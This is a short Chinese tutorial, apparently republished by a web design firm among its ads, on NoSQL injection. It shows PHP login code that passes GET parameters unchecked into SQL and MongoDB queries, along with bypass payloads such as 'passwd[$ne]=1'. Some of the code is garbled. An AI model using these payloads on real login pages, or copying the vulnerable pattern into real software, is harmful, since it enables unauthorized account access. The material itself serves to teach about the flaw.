怎样利用GET参数判断不严格进行MongoDB注入

本篇文章给大家分享的是有关怎样利用GET参数判断不严格进行MongoDB注入,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

目前创新互联建站已为上1000家的企业提供了网站建设、域名、网页空间、绵阳服务器托管、企业网站设计、枞阳网站维护等服务,公司将坚持客户导向、应用为本的策略,正道将秉承"和谐、参与、激情"的文化,与客户和合作伙伴齐心协力一起成长,共同发展。

成都创新互联公司网站建设公司是一家服务多年做网站建设策划设计制作的公司,为广大用户提供了网站设计、成都网站制作,成都网站设计,广告投放平台,成都做网站选成都创新互联公司,贴合企业需求,高性价比,满足客户不同层次的需求一站式服务欢迎致电。

在关系型数据库时代,SQL注入攻防几乎成了每一个Web开发者的必修课,很多NOSQL的支持者称NoSQL的同时也就NoSQL注入了。

怎样利用GET参数判断不严格进行MongoDB注入

使用SQL数据库存储用户名密码的系统,我们检测用户名与密码的过程可能是这样的:

MySQL_query("SELECT*FROMuser

WHEREusername=".$_GET['username'].",

ANDpasswd=".$_GET['passwd'])

我们使用MongoDB进行最简单的用户名与密码检测可能是这样的:

$collection->find(array(

"username"=>$_GET['username'],

"passwd"=>$_GET['passwd']

));

怎样利用GET参数判断不严格进行MongoDB注入

在最普通的SQL注入中,我们可以构造下面这样的请求:

login.php?username=admin&passwd=abcOR1–

这个请求会形成这样的SQL语句:

SELECT*FROMuserWHEREusername=adminANDpasswd=abcOR1;

成功注入!

采用同理的方法,针对上面的MongoDB查询方式,你可以构造下面的请求:

login.php?username=admin&passwd[$ne]=1

这个请求会形成这样的MongoDB查询:

$collection->find(array(

"username"=>"admin",

"passwd"=>array("$ne"=>1)

));

成功注入!

以上就是怎样利用GET参数判断不严格进行MongoDB注入,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注创新互联行业资讯频道。


分享名称:怎样利用GET参数判断不严格进行MongoDB注入
当前链接:http://bzwzjz.com/article/iijpod.html

其他资讯

Copyright © 2007-2020 广东宝晨空调科技有限公司 All Rights Reserved 粤ICP备2022107769号
友情链接: 成都网站建设 企业网站设计 重庆网站建设 成都网站建设 成都网站设计 成都网站建设流程 温江网站设计 重庆企业网站建设 成都网站制作 app网站建设 网站制作 响应式网站设计 成都网站建设 成都网站建设 泸州网站建设 成都响应式网站建设公司 成都网站制作 定制网站制作 成都网站建设 四川成都网站设计 网站设计制作 成都网站制作